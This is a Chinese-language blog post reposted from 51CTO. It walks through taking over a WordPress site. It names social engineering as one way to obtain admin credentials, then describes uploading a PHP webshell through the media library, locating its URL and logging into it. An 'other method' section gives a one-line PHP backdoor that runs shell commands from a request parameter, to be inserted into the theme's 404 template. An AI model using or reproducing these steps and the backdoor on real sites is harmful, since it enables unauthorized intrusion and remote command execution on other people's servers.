wordpress拿WebShell

科技小能手發表於2017-11-12
Webshell
wordpressWebShell
Simeon 安天365
   WordPress是世界上用的最多的一款blog,可以說是世界流行,在前段時間爆出有一個任意檔案漏洞,但由於時間很忙就沒有進行測試,最近偶然拿到一個wordpressblog,實際測試效果不錯,下面將整個過程寫出來跟朋友分享。
(一)獲取管理員使用者名稱和密碼
   關於如何獲取管理員使用者和密碼不在本文的主要討論範圍,筆者有兩點經驗,一個是社工;另外一個就是已有資訊的利用;在獲取Webshell的情況下,對現有資訊的分析和利用,有可能獲取WordPress後臺管理密碼。WordPress後臺位置一般為:http://www.xxx.com/blog/wp-admin,顯示頁面如圖1所示,輸入正確的使用者名稱和密碼後順利登入,如圖2所示。
1 WordPress登入後臺
成功登入後臺
(二)尋找上傳處
 WordPress管理頁面的左邊單擊“媒體”“新增媒體案”,接著就會出來一個上傳的介面,在該介面中選擇“Browser 上傳功能”,如圖3所示,直接選擇phpWebshell上傳即可。
獲取上傳頁面
(三)瀏覽上傳記錄
   上傳Webshell後,有些系統裝有防毒軟體會查殺部分Webshell,因此需要通過瀏覽記錄來驗證檔案是否上傳,系統在上傳WebShell後會自動重新整理,如果上傳沒有出現問題,則會如圖4所示,上傳檔案顯示在媒體庫中。
檢視上傳的Webshell記錄
(四)獲取Webshell的直接地址
    將滑鼠移動到上傳的Webshell記錄上,可以看到有三個按鈕“編輯”、“刪除”和“檢視”,單擊檢視即可訪問Webshell的具體頁面,如圖5所示,選擇記錄中的連結,該連結地址即為真正的Webshell地址。
獲取上傳的Webshell頁面
(五)獲取WebShell
   直接開啟Webshell的地址,輸入密碼驗證成功後,進入熟悉的Webshell介面,如圖6所示,至此拿到了WordPressWebshell
6獲取WebShell
(六)其他方法獲取Webshell探討
   通過詢問群裡好友,感謝cnbird提供的一個方法,不過我測試後未能獲取Webshell,不知是咋個回事,現將利用方法奉上:
1)進入後臺
2)單擊“外觀”“編輯”404模板”插入一句話木馬程式程式碼:<?php@system($_REQUEST[c]);?>,如圖7所示,插入後進行更新。
3)使用連線地址wordpress/wp-content/themes/default/404.php進行連線。結果沒有反應,很是鬱悶!
插入一句話程式碼



 本文轉自 simeon2005 51CTO部落格,原文連結:http://blog.51cto.com/simeon/277369


相關文章